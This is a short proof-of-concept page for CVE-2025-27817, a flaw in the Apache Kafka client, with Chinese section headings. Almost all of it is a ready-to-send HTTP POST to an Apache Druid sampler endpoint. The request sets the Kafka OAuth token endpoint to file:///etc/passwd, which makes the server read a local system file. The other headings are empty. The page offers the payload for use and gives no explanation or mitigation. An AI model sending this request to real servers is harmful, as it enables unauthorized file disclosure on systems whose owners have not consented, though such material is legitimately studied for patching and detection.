CVE-2025-27817 PoC — Apache Kafka Client 安全漏洞

Description

CVE-2025-27817

介绍

```http
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 1617

{
  "type": "kafka",
  "spec": {
    "type": "kafka",
    "ioConfig": {
      "type": "kafka",
      "consumerProperties": {
        "bootstrap.servers": "127.0.0.1:6666",
        "sasl.mechanism": "OAUTHBEARER",
        "security.protocol": "SASL_SSL",
        "sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler",
        "sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
        "sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"
      },
      "topic": "test",
      "useEarliestOffset": true,
      "inputFormat": {
        "type": "regex",
        "pattern": "([\\s\\S]*)",
        "listDelimiter": "",
        "columns": ["raw"]
      }
    },
    "dataSchema": {
      "dataSource": "sample",
      "timestampSpec": {
        "column": "!!!_no_such_column_!!!",
        "missingValue": "1970-01-01T00:00:00Z"
      },
      "dimensionsSpec": {},
      "granularitySpec": {
        "rollup": false
      }
    },
    "tuningConfig": {
      "type": "kafka"
    }
  },
  "samplerConfig": {
    "numRows": 500,
    "timeoutMs": 15000
  }
}
```

文件快照

备注